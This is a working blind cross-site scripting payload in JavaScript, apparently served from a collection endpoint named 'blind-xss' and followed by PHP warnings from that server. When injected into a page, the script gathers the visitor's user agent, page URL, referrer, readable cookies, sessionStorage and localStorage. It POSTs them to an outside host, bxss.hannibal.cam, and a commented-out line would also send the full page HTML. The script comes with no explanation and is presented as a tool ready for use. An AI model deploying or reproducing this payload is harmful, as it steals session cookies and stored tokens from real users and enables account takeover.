var mailer = '//bxss.hannibal.cam/'; var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' + document.URL; msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE COOKIES\n' + document.cookie; msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) + '\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage); // msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML; var r = new XMLHttpRequest(); r.open('POST', mailer, true); r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); r.send('origin=' + document.location.origin + '&msg=' + encodeURIComponent(msg));
Warning: Undefined array key "origin" in /var/www/html/blind-xss/index.php on line 15

Warning: Undefined array key "origin" in /var/www/html/blind-xss/index.php on line 17

Warning: Undefined array key "HTTP_X_FORWARDED_FOR" in /var/www/html/blind-xss/index.php on line 19

Warning: Undefined array key "HTTP_REFERER" in /var/www/html/blind-xss/index.php on line 19

Warning: Undefined array key "msg" in /var/www/html/blind-xss/index.php on line 20